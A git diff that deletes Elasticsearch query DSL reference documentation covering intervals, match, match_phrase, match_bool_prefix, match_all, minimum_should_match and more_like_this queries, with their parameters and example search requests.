"max_gaps" : 0, - "ordered" : true - } - }, - { - "any_of" : { - "intervals" : [ - { "match" : { "query" : "hot water" } }, - { "match" : { "query" : "cold porridge" } } - ] - } - } - ] - } - } - } - } -} --------------------------------------------------- - -[[intervals-top-level-params]] -==== Top-level parameters for `intervals` -[[intervals-rules]] -``:: -+ --- -(Required, rule object) Field you wish to search. - -The value of this parameter is a rule object used to match documents -based on matching terms, order, and proximity. - -Valid rules include: - -* <> -* <> -* <> -* <> -* <> -* <> --- - -[[intervals-match]] -==== `match` rule parameters - -The `match` rule matches analyzed text. - -`query`:: -(Required, string) Text you wish to find in the provided ``. - -`max_gaps`:: -+ --- -(Optional, integer) Maximum number of positions between the matching terms. -Terms further apart than this are not considered matches. Defaults to -`-1`. - -If unspecified or set to `-1`, there is no width restriction on the match. If -set to `0`, the terms must appear next to each other. --- - -`ordered`:: -(Optional, Boolean) -If `true`, matching terms must appear in their specified order. Defaults to -`false`. - -`analyzer`:: -(Optional, string) <> used to analyze terms in the `query`. -Defaults to the top-level ``'s analyzer. - -`filter`:: -(Optional, <> rule object) An optional interval -filter. - -`use_field`:: -(Optional, string) If specified, then match intervals from this -field rather than the top-level ``. Terms are analyzed using the -search analyzer from this field. This allows you to search across multiple -fields as if they were all the same field; for example, you could index the same -text into stemmed and unstemmed fields, and search for stemmed tokens near -unstemmed ones. - -[[intervals-prefix]] -==== `prefix` rule parameters - -The `prefix` rule matches terms that start with a specified set of characters. -This prefix can expand to match at most 128 terms. If the prefix matches more -than 128 terms, {es} returns an error. You can use the -<> option in the field mapping to avoid this -limit. - -`prefix`:: -(Required, string) Beginning characters of terms you wish to find in the -top-level ``. - -`analyzer`:: -(Optional, string) <> used to normalize the `prefix`. -Defaults to the top-level ``'s analyzer. - -`use_field`:: -+ --- -(Optional, string) If specified, then match intervals from this field rather -than the top-level ``. - -The `prefix` is normalized using the search analyzer from this field, unless a -separate `analyzer` is specified. --- - -[[intervals-wildcard]] -==== `wildcard` rule parameters - -The `wildcard` rule matches terms using a wildcard pattern. This pattern can -expand to match at most 128 terms. If the pattern matches more than 128 terms, -{es} returns an error. - -`pattern`:: -(Required, string) Wildcard pattern used to find matching terms. -+ --- -This parameter supports two wildcard operators: - -* `?`, which matches any single character -* `*`, which can match zero or more characters, including an empty one - -WARNING: Avoid beginning patterns with `*` or `?`. This can increase -the iterations needed to find matching terms and slow search performance. --- -`analyzer`:: -(Optional, string) <> used to normalize the `pattern`. -Defaults to the top-level ``'s analyzer. - -`use_field`:: -+ --- -(Optional, string) If specified, match intervals from this field rather than the -top-level ``. - -The `pattern` is normalized using the search analyzer from this field, unless -`analyzer` is specified separately. --- - -[[intervals-fuzzy]] -==== `fuzzy` rule parameters - -The `fuzzy` rule matches terms that are similar to the provided term, within an -edit distance defined by <>. If the fuzzy expansion matches more than -128 terms, {es} returns an error. - -`term`:: -(Required, string) The term to match - -`prefix_length`:: -(Optional, string) Number of beginning characters left unchanged when creating -expansions. Defaults to `0`. - -`transpositions`:: -(Optional, Boolean) Indicates whether edits include transpositions of two -adjacent characters (ab → ba). Defaults to `true`. - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. Defaults to `auto`. - -`analyzer`:: -(Optional, string) <> used to normalize the `term`. -Defaults to the top-level `` 's analyzer. - -`use_field`:: -+ --- -(Optional, string) If specified, match intervals from this field rather than the -top-level ``. - -The `term` is normalized using the search analyzer from this field, unless -`analyzer` is specified separately. --- - -[[intervals-all_of]] -==== `all_of` rule parameters - -The `all_of` rule returns matches that span a combination of other rules. - -`intervals`:: -(Required, array of rule objects) An array of rules to combine. All rules must -produce a match in a document for the overall source to match. - -`max_gaps`:: -+ --- -(Optional, integer) Maximum number of positions between the matching terms. -Intervals produced by the rules further apart than this are not considered -matches. Defaults to `-1`. - -If unspecified or set to `-1`, there is no width restriction on the match. If -set to `0`, the terms must appear next to each other. --- - -`ordered`:: -(Optional, Boolean) If `true`, intervals produced by the rules should appear in -the order in which they are specified. Defaults to `false`. - -`filter`:: -(Optional, <> rule object) Rule used to filter -returned intervals. - -[[intervals-any_of]] -==== `any_of` rule parameters - -The `any_of` rule returns intervals produced by any of its sub-rules. - -`intervals`:: -(Required, array of rule objects) An array of rules to match. - -`filter`:: -(Optional, <> rule object) Rule used to filter -returned intervals. - -[[interval_filter]] -==== `filter` rule parameters - -The `filter` rule returns intervals based on a query. See -<> for an example. - -`after`:: -(Optional, query object) Query used to return intervals that follow an interval -from the `filter` rule. - -`before`:: -(Optional, query object) Query used to return intervals that occur before an -interval from the `filter` rule. - -`contained_by`:: -(Optional, query object) Query used to return intervals contained by an interval -from the `filter` rule. - -`containing`:: -(Optional, query object) Query used to return intervals that contain an interval -from the `filter` rule. - -`not_contained_by`:: -(Optional, query object) Query used to return intervals that are *not* -contained by an interval from the `filter` rule. - -`not_containing`:: -(Optional, query object) Query used to return intervals that do *not* contain -an interval from the `filter` rule. - -`not_overlapping`:: -(Optional, query object) Query used to return intervals that do *not* overlap -with an interval from the `filter` rule. - -`overlapping`:: -(Optional, query object) Query used to return intervals that overlap with an -interval from the `filter` rule. - -`script`:: -(Optional, <>) Script used to return -matching documents. This script must return a boolean value, `true` or `false`. -See <> for an example. - - -[[intervals-query-note]] -==== Notes - -[[interval-filter-rule-ex]] -===== Filter example - -The following search includes a `filter` rule. It returns documents that have -the words `hot` and `porridge` within 10 positions of each other, without the -word `salty` in between: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "match" : { - "query" : "hot porridge", - "max_gaps" : 10, - "filter" : { - "not_containing" : { - "match" : { - "query" : "salty" - } - } - } - } - } - } - } -} --------------------------------------------------- - -[[interval-script-filter]] -===== Script filters - -You can use a script to filter intervals based on their start position, end -position, and internal gap count. The following `filter` script uses the -`interval` variable with the `start`, `end`, and `gaps` methods: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "match" : { - "query" : "hot porridge", - "filter" : { - "script" : { - "source" : "interval.start > 10 && interval.end < 20 && interval.gaps == 0" - } - } - } - } - } - } -} --------------------------------------------------- - - -[[interval-minimization]] -===== Minimization - -The intervals query always minimizes intervals, to ensure that queries can -run in linear time. This can sometimes cause surprising results, particularly -when using `max_gaps` restrictions or filters. For example, take the -following query, searching for `salty` contained within the phrase `hot -porridge`: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "match" : { - "query" : "salty", - "filter" : { - "contained_by" : { - "match" : { - "query" : "hot porridge" - } - } - } - } - } - } - } -} --------------------------------------------------- - -This query does *not* match a document containing the phrase `hot porridge is -salty porridge`, because the intervals returned by the match query for `hot -porridge` only cover the initial two terms in this document, and these do not -overlap the intervals covering `salty`. - -Another restriction to be aware of is the case of `any_of` rules that contain -sub-rules which overlap. In particular, if one of the rules is a strict -prefix of the other, then the longer rule can never match, which can -cause surprises when used in combination with `max_gaps`. Consider the -following query, searching for `the` immediately followed by `big` or `big bad`, -immediately followed by `wolf`: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "all_of" : { - "intervals" : [ - { "match" : { "query" : "the" } }, - { "any_of" : { - "intervals" : [ - { "match" : { "query" : "big" } }, - { "match" : { "query" : "big bad" } } - ] } }, - { "match" : { "query" : "wolf" } } - ], - "max_gaps" : 0, - "ordered" : true - } - } - } - } -} --------------------------------------------------- - -Counter-intuitively, this query does *not* match the document `the big bad -wolf`, because the `any_of` rule in the middle only produces intervals -for `big` - intervals for `big bad` being longer than those for `big`, while -starting at the same position, and so being minimized away. In these cases, -it's better to rewrite the query so that all of the options are explicitly -laid out at the top level: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "any_of" : { - "intervals" : [ - { "match" : { - "query" : "the big bad wolf", - "ordered" : true, - "max_gaps" : 0 } }, - { "match" : { - "query" : "the big wolf", - "ordered" : true, - "max_gaps" : 0 } } - ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/joining-queries.asciidoc b/docs/reference/query-dsl/joining-queries.asciidoc deleted file mode 100644 index f10c2bda603..00000000000 --- a/docs/reference/query-dsl/joining-queries.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[joining-queries]] -== Joining queries - -Performing full SQL-style joins in a distributed system like Elasticsearch is -prohibitively expensive. Instead, Elasticsearch offers two forms of join -which are designed to scale horizontally. - -<>:: -Documents may contain fields of type <>. These -fields are used to index arrays of objects, where each object can be queried -(with the `nested` query) as an independent document. - -<> and <> queries:: -A <> can exist between -documents within a single index. The `has_child` query returns parent -documents whose child documents match the specified query, while the -`has_parent` query returns child documents whose parent document matches the -specified query. - -Also see the <> in the `terms` -query, which allows you to build a `terms` query from values contained in -another document. - -[discrete] -[[joining-queries-notes]] -==== Notes - -[discrete] -===== Allow expensive queries -Joining queries will not be executed if <> -is set to false. - -include::nested-query.asciidoc[] - -include::has-child-query.asciidoc[] - -include::has-parent-query.asciidoc[] - -include::parent-id-query.asciidoc[] - - diff --git a/docs/reference/query-dsl/match-all-query.asciidoc b/docs/reference/query-dsl/match-all-query.asciidoc deleted file mode 100644 index 6c77e4b83fd..00000000000 --- a/docs/reference/query-dsl/match-all-query.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[query-dsl-match-all-query]] -== Match all query -++++ -Match all -++++ - -The most simple query, which matches all documents, giving them all a `_score` -of `1.0`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_all": {} - } -} --------------------------------------------------- - -The `_score` can be changed with the `boost` parameter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_all": { "boost" : 1.2 } - } -} --------------------------------------------------- - -[[query-dsl-match-none-query]] -[discrete] -== Match None Query - -This is the inverse of the `match_all` query, which matches no documents. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_none": {} - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/match-bool-prefix-query.asciidoc b/docs/reference/query-dsl/match-bool-prefix-query.asciidoc deleted file mode 100644 index 6d59e9a6df2..00000000000 --- a/docs/reference/query-dsl/match-bool-prefix-query.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[query-dsl-match-bool-prefix-query]] -=== Match boolean prefix query -++++ -Match boolean prefix -++++ - -A `match_bool_prefix` query analyzes its input and constructs a -<> from the terms. Each term except the last -is used in a `term` query. The last term is used in a `prefix` query. A -`match_bool_prefix` query such as - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_bool_prefix" : { - "message" : "quick brown f" - } - } -} --------------------------------------------------- - -where analysis produces the terms `quick`, `brown`, and `f` is similar to the -following `bool` query - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool" : { - "should": [ - { "term": { "message": "quick" }}, - { "term": { "message": "brown" }}, - { "prefix": { "message": "f"}} - ] - } - } -} --------------------------------------------------- - -An important difference between the `match_bool_prefix` query and -<> is that the -`match_phrase_prefix` query matches its terms as a phrase, but the -`match_bool_prefix` query can match its terms in any position. The example -`match_bool_prefix` query above could match a field containing -`quick brown fox`, but it could also match `brown fox quick`. It could also -match a field containing the term `quick`, the term `brown` and a term -starting with `f`, appearing in any position. - -==== Parameters - -By default, `match_bool_prefix` queries' input text will be analyzed using the -analyzer from the queried field's mapping. A different search analyzer can be -configured with the `analyzer` parameter - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_bool_prefix": { - "message": { - "query": "quick brown f", - "analyzer": "keyword" - } - } - } -} --------------------------------------------------- - -`match_bool_prefix` queries support the -<> and `operator` -parameters as described for the -<>, applying the setting to the -constructed `bool` query. The number of clauses in the constructed `bool` -query will in most cases be the number of terms produced by analysis of the -query text. - -The <>, `prefix_length`, -`max_expansions`, `fuzzy_transpositions`, and `fuzzy_rewrite` parameters can -be applied to the `term` subqueries constructed for all terms but the final -term. They do not have any effect on the prefix query constructed for the -final term. diff --git a/docs/reference/query-dsl/match-phrase-prefix-query.asciidoc b/docs/reference/query-dsl/match-phrase-prefix-query.asciidoc deleted file mode 100644 index 04b757ba901..00000000000 --- a/docs/reference/query-dsl/match-phrase-prefix-query.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[[query-dsl-match-query-phrase-prefix]] -=== Match phrase prefix query -++++ -Match phrase prefix -++++ - -Returns documents that contain the words of a provided text, in the **same -order** as provided. The last term of the provided text is treated as a -<>, matching any words that begin with that term. - - -[[match-phrase-prefix-query-ex-request]] -==== Example request - -The following search returns documents that contain phrases beginning with -`quick brown f` in the `message` field. - -This search would match a `message` value of `quick brown fox` or `two quick -brown ferrets` but not `the fox is quick and brown`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_phrase_prefix": { - "message": { - "query": "quick brown f" - } - } - } -} --------------------------------------------------- - - -[[match-phrase-prefix-top-level-params]] -==== Top-level parameters for `match_phrase_prefix` -``:: -(Required, object) Field you wish to search. - -[[match-phrase-prefix-field-params]] -==== Parameters for `` -`query`:: -+ --- -(Required, string) Text you wish to find in the provided ``. - -The `match_phrase_prefix` query <> any provided text into -tokens before performing a search. The last term of this text is treated as a -<>, matching any words that begin with that term. --- - -`analyzer`:: -(Optional, string) <> used to convert text in the `query` -value into tokens. Defaults to the <> mapped for the ``. If no analyzer is mapped, the index's -default analyzer is used. - -`max_expansions`:: -(Optional, integer) Maximum number of terms to which the last provided term of -the `query` value will expand. Defaults to `50`. - -`slop`:: -(Optional, integer) Maximum number of positions allowed between matching tokens. -Defaults to `0`. Transposed terms have a slop of `2`. - -`zero_terms_query`:: -+ --- -(Optional, string) Indicates whether no documents are returned if the `analyzer` -removes all tokens, such as when using a `stop` filter. Valid values are: - - `none` (Default):: -No documents are returned if the `analyzer` removes all tokens. - - `all`:: -Returns all documents, similar to a <> -query. --- - - -[[match-phrase-prefix-query-notes]] -==== Notes - -[[match-phrase-prefix-autocomplete]] -===== Using the match phrase prefix query for search autocompletion -While easy to set up, using the `match_phrase_prefix` query for search -autocompletion can sometimes produce confusing results. - -For example, consider the query string `quick brown f`. This query works by -creating a phrase query out of `quick` and `brown` (i.e. the term `quick` must -exist and must be followed by the term `brown`). Then it looks at the sorted -term dictionary to find the first 50 terms that begin with `f`, and adds these -terms to the phrase query. - -The problem is that the first 50 terms may not include the term `fox` so the -phrase `quick brown fox` will not be found. This usually isn't a problem as -the user will continue to type more letters until the word they are looking -for appears. - -For better solutions for _search-as-you-type_ see the -<> and -the <>. \ No newline at end of file diff --git a/docs/reference/query-dsl/match-phrase-query.asciidoc b/docs/reference/query-dsl/match-phrase-query.asciidoc deleted file mode 100644 index f6b0fa19001..00000000000 --- a/docs/reference/query-dsl/match-phrase-query.asciidoc +++ /dev/null @@ -1,44 +0,0 @@ -[[query-dsl-match-query-phrase]] -=== Match phrase query -++++ -Match phrase -++++ - -The `match_phrase` query analyzes the text and creates a `phrase` query -out of the analyzed text. For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_phrase": { - "message": "this is a test" - } - } -} --------------------------------------------------- - -A phrase query matches terms up to a configurable `slop` -(which defaults to 0) in any order. Transposed terms have a slop of 2. - -The `analyzer` can be set to control which analyzer will perform the -analysis process on the text. It defaults to the field explicit mapping -definition, or the default search analyzer, for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_phrase": { - "message": { - "query": "this is a test", - "analyzer": "my_analyzer" - } - } - } -} --------------------------------------------------- - -This query also accepts `zero_terms_query`, as explained in <>. diff --git a/docs/reference/query-dsl/match-query.asciidoc b/docs/reference/query-dsl/match-query.asciidoc deleted file mode 100644 index 93303ef1047..00000000000 --- a/docs/reference/query-dsl/match-query.asciidoc +++ /dev/null @@ -1,334 +0,0 @@ -[[query-dsl-match-query]] -=== Match query -++++ -Match -++++ - -Returns documents that match a provided text, number, date or boolean value. The -provided text is analyzed before matching. - -The `match` query is the standard query for performing a full-text search, -including options for fuzzy matching. - - -[[match-query-ex-request]] -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "this is a test" - } - } - } -} --------------------------------------------------- - - -[[match-top-level-params]] -==== Top-level parameters for `match` - -``:: -(Required, object) Field you wish to search. - - -[[match-field-params]] -==== Parameters for `` -`query`:: -+ --- -(Required) Text, number, boolean value or date you wish to find in the provided -``. - -The `match` query <> any provided text before performing a -search. This means the `match` query can search <> fields for -analyzed tokens rather than an exact term. --- - -`analyzer`:: -(Optional, string) <> used to convert the text in the `query` -value into tokens. Defaults to the <> mapped for the ``. If no analyzer is mapped, the index's -default analyzer is used. - -`auto_generate_synonyms_phrase_query`:: -+ --- -(Optional, Boolean) If `true`, <> -queries are automatically created for multi-term synonyms. Defaults to `true`. - -See <> for an -example. --- - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. See <> -for an example. - -`max_expansions`:: -(Optional, integer) Maximum number of terms to which the query will -expand. Defaults to `50`. - -`prefix_length`:: -(Optional, integer) Number of beginning characters left unchanged for fuzzy -matching. Defaults to `0`. - -`fuzzy_transpositions`:: -(Optional, Boolean) If `true`, edits for fuzzy matching include -transpositions of two adjacent characters (ab → ba). Defaults to `true`. - -`fuzzy_rewrite`:: -+ --- -(Optional, string) Method used to rewrite the query. See the -<> for valid values and more -information. - -If the `fuzziness` parameter is not `0`, the `match` query uses a `fuzzy_rewrite` -method of `top_terms_blended_freqs_${max_expansions}` by default. --- - -`lenient`:: -(Optional, Boolean) If `true`, format-based errors, such as providing a text -`query` value for a <> field, are ignored. Defaults to `false`. - -`operator`:: -+ --- -(Optional, string) Boolean logic used to interpret text in the `query` value. -Valid values are: - -`OR` (Default):: -For example, a `query` value of `capital of Hungary` is interpreted as `capital -OR of OR Hungary`. - -`AND`:: -For example, a `query` value of `capital of Hungary` is interpreted as `capital -AND of AND Hungary`. --- - -`minimum_should_match`:: -+ --- -(Optional, string) Minimum number of clauses that must match for a document to -be returned. See the <> for valid values and more information. --- - -`zero_terms_query`:: -+ --- -(Optional, string) Indicates whether no documents are returned if the `analyzer` -removes all tokens, such as when using a `stop` filter. Valid values are: - -`none` (Default):: -No documents are returned if the `analyzer` removes all tokens. - -`all`:: -Returns all documents, similar to a <> -query. - -See <> for an example. --- - - -[[match-query-notes]] -==== Notes - -[[query-dsl-match-query-short-ex]] -===== Short request example - -You can simplify the match query syntax by combining the `` and `query` -parameters. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "match": { - "message": "this is a test" - } - } -} ----- - -[[query-dsl-match-query-boolean]] -===== How the match query works - -The `match` query is of type `boolean`. It means that the text -provided is analyzed and the analysis process constructs a boolean query -from the provided text. The `operator` parameter can be set to `or` or `and` -to control the boolean clauses (defaults to `or`). The minimum number of -optional `should` clauses to match can be set using the -<> -parameter. - -Here is an example with the `operator` parameter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "this is a test", - "operator": "and" - } - } - } -} --------------------------------------------------- - -The `analyzer` can be set to control which analyzer will perform the -analysis process on the text. It defaults to the field explicit mapping -definition, or the default search analyzer. - -The `lenient` parameter can be set to `true` to ignore exceptions caused by -data-type mismatches, such as trying to query a numeric field with a text -query string. Defaults to `false`. - -[[query-dsl-match-query-fuzziness]] -===== Fuzziness in the match query - -`fuzziness` allows _fuzzy matching_ based on the type of field being queried. -See <> for allowed settings. - -The `prefix_length` and -`max_expansions` can be set in this case to control the fuzzy process. -If the fuzzy option is set the query will use `top_terms_blended_freqs_${max_expansions}` -as its <> the `fuzzy_rewrite` parameter allows to control how the query will get -rewritten. - -Fuzzy transpositions (`ab` -> `ba`) are allowed by default but can be disabled -by setting `fuzzy_transpositions` to `false`. - -NOTE: Fuzzy matching is not applied to terms with synonyms or in cases where the -analysis process produces multiple tokens at the same position. Under the hood -these terms are expanded to a special synonym query that blends term frequencies, -which does not support fuzzy expansion. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "this is a testt", - "fuzziness": "AUTO" - } - } - } -} --------------------------------------------------- - -[[query-dsl-match-query-zero]] -===== Zero terms query -If the analyzer used removes all tokens in a query like a `stop` filter -does, the default behavior is to match no documents at all. In order to -change that the `zero_terms_query` option can be used, which accepts -`none` (default) and `all` which corresponds to a `match_all` query. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "to be or not to be", - "operator": "and", - "zero_terms_query": "all" - } - } - } -} --------------------------------------------------- - -[[query-dsl-match-query-cutoff]] -===== Cutoff frequency - -deprecated[7.3.0,"This option can be omitted as the <> can skip blocks of documents efficiently, without any configuration, provided that the total number of hits is not tracked."] - -The match query supports a `cutoff_frequency` that allows -specifying an absolute or relative document frequency where high -frequency terms are moved into an optional subquery and are only scored -if one of the low frequency (below the cutoff) terms in the case of an -`or` operator or all of the low frequency terms in the case of an `and` -operator match. - -This query allows handling `stopwords` dynamically at runtime, is domain -independent and doesn't require a stopword file. It prevents scoring / -iterating high frequency terms and only takes the terms into account if a -more significant / lower frequency term matches a document. Yet, if all -of the query terms are above the given `cutoff_frequency` the query is -automatically transformed into a pure conjunction (`and`) query to -ensure fast execution. - -The `cutoff_frequency` can either be relative to the total number of -documents if in the range from 0 (inclusive) to 1 (exclusive) or absolute if greater or equal to -`1.0`. - -Here is an example showing a query composed of stopwords exclusively: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "message": { - "query": "to be or not to be", - "cutoff_frequency": 0.001 - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [cutoff_frequency] used, replaced by [you can omit this option, the [match] query can skip block of documents efficiently if the total number of hits is not tracked]] - -IMPORTANT: The `cutoff_frequency` option operates on a per-shard-level. This means -that when trying it out on test indexes with low document numbers you -should follow the advice in {defguide}/relevance-is-broken.html[Relevance is broken]. - -[[query-dsl-match-query-synonyms]] -===== Synonyms - -The `match` query supports multi-terms synonym expansion with the <> token filter. When this filter is used, the parser creates a phrase query for each multi-terms synonyms. -For example, the following synonym: `"ny, new york"` would produce: - -`(ny OR ("new york"))` - -It is also possible to match multi terms synonyms with conjunctions instead: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match" : { - "message": { - "query" : "ny city", - "auto_generate_synonyms_phrase_query" : false - } - } - } -} --------------------------------------------------- - -The example above creates a boolean query: - -`(ny OR (new AND york)) city` - -that matches documents with the term `ny` or the conjunction `new AND york`. -By default the parameter `auto_generate_synonyms_phrase_query` is set to `true`. - diff --git a/docs/reference/query-dsl/minimum-should-match.asciidoc b/docs/reference/query-dsl/minimum-should-match.asciidoc deleted file mode 100644 index fc0479265fc..00000000000 --- a/docs/reference/query-dsl/minimum-should-match.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[query-dsl-minimum-should-match]] -== `minimum_should_match` parameter - -The `minimum_should_match` parameter's possible values: - -[cols="<,<,<",options="header",] -|======================================================================= -|Type |Example |Description -|Integer |`3` |Indicates a fixed value regardless of the number of -optional clauses. - -|Negative integer |`-2` |Indicates that the total number of optional -clauses, minus this number should be mandatory. - -|Percentage |`75%` |Indicates that this percent of the total number of -optional clauses are necessary. The number computed from the percentage -is rounded down and used as the minimum. - -|Negative percentage |`-25%` |Indicates that this percent of the total -number of optional clauses can be missing. The number computed from the -percentage is rounded down, before being subtracted from the total to -determine the minimum. - -|Combination |`3<90%` |A positive integer, followed by the less-than -symbol, followed by any of the previously mentioned specifiers is a -conditional specification. It indicates that if the number of optional -clauses is equal to (or less than) the integer, they are all required, -but if it's greater than the integer, the specification applies. In this -example: if there are 1 to 3 clauses they are all required, but for 4 or -more clauses only 90% are required. - -|Multiple combinations |`2<-25% 9<-3` |Multiple conditional -specifications can be separated by spaces, each one only being valid for -numbers greater than the one before it. In this example: if there are 1 -or 2 clauses both are required, if there are 3-9 clauses all but 25% are -required, and if there are more than 9 clauses, all but three are -required. -|======================================================================= - -*NOTE:* - -When dealing with percentages, negative values can be used to get -different behavior in edge cases. 75% and -25% mean the same thing when -dealing with 4 clauses, but when dealing with 5 clauses 75% means 3 are -required, but -25% means 4 are required. - -If the calculations based on the specification determine that no -optional clauses are needed, the usual rules about BooleanQueries still -apply at search time (a BooleanQuery containing no required clauses must -still match at least one optional clause) - -No matter what number the calculation arrives at, a value greater than -the number of optional clauses, or a value less than 1 will never be -used. (ie: no matter how low or how high the result of the calculation -result is, the minimum number of required matches will never be lower -than 1 or greater than the number of clauses. diff --git a/docs/reference/query-dsl/mlt-query.asciidoc b/docs/reference/query-dsl/mlt-query.asciidoc deleted file mode 100644 index f54a6d03b12..00000000000 --- a/docs/reference/query-dsl/mlt-query.asciidoc +++ /dev/null @@ -1,252 +0,0 @@ -[[query-dsl-mlt-query]] -=== More like this query -++++ -More like this -++++ - -The More Like This Query finds documents that are "like" a given -set of documents. In order to do so, MLT selects a set of representative terms -of these input documents, forms a query using these terms, executes the query -and returns the results. The user controls the input documents, how the terms -should be selected and how the query is formed. - -The simplest use case consists of asking for documents that are similar to a -provided piece of text. Here, we are asking for all movies that have some text -similar to "Once upon a time" in their "title" and in their "description" -fields, limiting the number of selected terms to 12. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "more_like_this" : { - "fields" : ["title", "description"], - "like" : "Once upon a time", - "min_term_freq" : 1, - "max_query_terms" : 12 - } - } -} --------------------------------------------------- - -A more complicated use case consists of mixing texts with documents already -existing in the index. In this case, the syntax to specify a document is -similar to the one used in the <>. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "more_like_this": { - "fields": [ "title", "description" ], - "like": [ - { - "_index": "imdb", - "_id": "1" - }, - { - "_index": "imdb", - "_id": "2" - }, - "and potentially some more text here as well" - ], - "min_term_freq": 1, - "max_query_terms": 12 - } - } -} --------------------------------------------------- - -Finally, users can mix some texts, a chosen set of documents but also provide -documents not necessarily present in the index. To provide documents not -present in the index, the syntax is similar to <>. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "more_like_this": { - "fields": [ "name.first", "name.last" ], - "like": [ - { - "_index": "marvel", - "doc": { - "name": { - "first": "Ben", - "last": "Grimm" - }, - "_doc": "You got no idea what I'd... what I'd give to be invisible." - } - }, - { - "_index": "marvel", - "_id": "2" - } - ], - "min_term_freq": 1, - "max_query_terms": 12 - } - } -} --------------------------------------------------- - -==== How it Works - -Suppose we wanted to find all documents similar to a given input document. -Obviously, the input document itself should be its best match for that type of -query. And the reason would be mostly, according to -link:https://lucene.apache.org/core/4_9_0/core/org/apache/lucene/search/similarities/TFIDFSimilarity.html[Lucene scoring formula], -due to the terms with the highest tf-idf. Therefore, the terms of the input -document that have the highest tf-idf are good representatives of that -document, and could be used within a disjunctive query (or `OR`) to retrieve similar -documents. The MLT query simply extracts the text from the input document, -analyzes it, usually using the same analyzer at the field, then selects the -top K terms with highest tf-idf to form a disjunctive query of these terms. - -IMPORTANT: The fields on which to perform MLT must be indexed and of type -`text` or `keyword``. Additionally, when using `like` with documents, either -`_source` must be enabled or the fields must be `stored` or store -`term_vector`. In order to speed up analysis, it could help to store term -vectors at index time. - -For example, if we wish to perform MLT on the "title" and "tags.raw" fields, -we can explicitly store their `term_vector` at index time. We can still -perform MLT on the "description" and "tags" fields, as `_source` is enabled by -default, but there will be no speed up on analysis for these fields. - -[source,console] --------------------------------------------------- -PUT /imdb -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "term_vector": "yes" - }, - "description": { - "type": "text" - }, - "tags": { - "type": "text", - "fields": { - "raw": { - "type": "text", - "analyzer": "keyword", - "term_vector": "yes" - } - } - } - } - } -} --------------------------------------------------- - -==== Parameters - -The only required parameter is `like`, all other parameters have sensible -defaults. There are three types of parameters: one to specify the document -input, the other one for term selection and for query formation. - -[discrete] -==== Document Input Parameters - -[horizontal] -`like`:: -The only *required* parameter of the MLT query is `like` and follows a -versatile syntax, in which the user can specify free form text and/or a single -or multiple documents (see examples above). The syntax to specify documents is -similar to the one used by the <>. When -specifying documents, the text is fetched from `fields` unless overridden in -each document request. The text is analyzed by the analyzer at the field, but -could also be overridden. The syntax to override the analyzer at the field -follows a similar syntax to the `per_field_analyzer` parameter of the -<>. -Additionally, to provide documents not necessarily present in the index, -<> are also supported. - -`unlike`:: -The `unlike` parameter is used in conjunction with `like` in order not to -select terms found in a chosen set of documents. In other words, we could ask -for documents `like: "Apple"`, but `unlike: "cake crumble tree"`. The syntax -is the same as `like`. - -`fields`:: -A list of fields to fetch and analyze the text from. - -[discrete] -[[mlt-query-term-selection]] -==== Term Selection Parameters - -[horizontal] -`max_query_terms`:: -The maximum number of query terms that will be selected. Increasing this value -gives greater accuracy at the expense of query execution speed. Defaults to -`25`. - -`min_term_freq`:: -The minimum term frequency below which the terms will be ignored from the -input document. Defaults to `2`. - -`min_doc_freq`:: -The minimum document frequency below which the terms will be ignored from the -input document. Defaults to `5`. - -`max_doc_freq`:: -The maximum document frequency above which the terms will be ignored from the -input document. This could be useful in order to ignore highly frequent words -such as stop words. Defaults to unbounded (`Integer.MAX_VALUE`, which is `2^31-1` -or 2147483647). - -`min_word_length`:: -The minimum word length below which the terms will be ignored. The old name -`min_word_len` is deprecated. Defaults to `0`. - -`max_word_length`:: -The maximum word length above which the terms will be ignored. The old name -`max_word_len` is deprecated. Defaults to unbounded (`0`). - -`stop_words`:: -An array of stop words. Any word in this set is considered "uninteresting" and -ignored. If the analyzer allows for stop words, you might want to tell MLT to -explicitly ignore them, as for the purposes of document similarity it seems -reasonable to assume that "a stop word is never interesting". - -`analyzer`:: -The analyzer that is used to analyze the free form text. Defaults to the -analyzer associated with the first field in `fields`. - -[discrete] -==== Query Formation Parameters - -[horizontal] -`minimum_should_match`:: -After the disjunctive query has been formed, this parameter controls the -number of terms 